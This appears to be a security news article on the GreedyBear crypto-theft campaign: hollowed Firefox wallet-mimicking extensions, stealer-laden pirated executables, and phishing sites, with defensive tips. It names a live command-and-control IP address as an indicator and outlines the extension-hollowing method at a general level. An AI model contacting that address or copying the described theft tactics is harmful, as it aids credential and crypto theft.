GreedyBear Crypto Theft: How Hackers Stole Over $1M Using Malicious Extensions and Malware
Cybercriminals have raised the stakes once again. The notorious group known as GreedyBear has successfully stolen over $1 million in cryptocurrency by launching a coordinated, large-scale attack leveraging browser extensions, malicious executables, and fake websites.
1. Weaponized Firefox Extensions: Extension Hollowing
GreedyBear published over 150 Firefox extensions that initially appeared harmless, such as link cleaners and video tools. Once enough users downloaded them, these extensions were updated with malicious scripts designed to mimic trusted wallets like MetaMask, TronLink, Exodus, and Rabby Wallet.
This method, known as extension hollowing, enabled them to steal wallet credentials and IP addresses directly from the browser’s UI elements.
2. Malware Executables Targeting Windows
The group deployed nearly 500 malicious executable files containing credential stealers like LummaStealer, ransomware variants, and Trojans. These files were distributed through Russian-language piracy websites hosting cracked or repacked software, enticing users into unknowingly installing malware.
3. Phishing Pages and Fake Crypto Websites
GreedyBear also set up scam websites pretending to offer crypto services like wallet tools or hardware wallets. These professionally designed sites tricked users into submitting sensitive data under false pretenses.
4. Single Command-and-Control Infrastructure
All attack components traced back to a central IP address: 185.208.156.66. This C2 server managed browser extension payloads, malware communication, and phishing operations, indicating a well-coordinated infrastructure.
5. A Campaign of Escalation
Originally known for the Foxy Wallet campaign with 40+ extensions, GreedyBear has now scaled to over 150 active threats. This rapid growth suggests AI-assisted malware development and a push for industrialized cyber theft.
Protect Yourself: Cyber Hygiene Tips
- Review and remove unfamiliar browser extensions frequently.
- Use verified, audited wallets—avoid browser-based crypto tools unless necessary.
- Avoid pirated software downloads from untrusted sources.
- Enable multi-factor authentication (MFA) on crypto accounts.
- Reset credentials immediately if you suspect compromise.
- Store your assets offline using cold wallets when possible.
Summary Table
| Aspect | Details |
|---|---|
| Theft Amount | Over $1 million in cryptocurrency |
| Attack Vectors | Browser extensions, malware executables, scam websites |
| Tools Used | Extension Hollowing, AI malware, credential stealers |
| C2 Server | 185.208.156.66 |
| Initial Campaign | Foxy Wallet – now rebranded and expanded |
Conclusion
The GreedyBear campaign showcases how cybercrime groups are evolving with sophisticated, multi-pronged strategies. Crypto users must adopt better security practices, remain vigilant, and avoid tools or software that haven’t been extensively vetted. As cyber threats escalate, proactive defense is the best safeguard.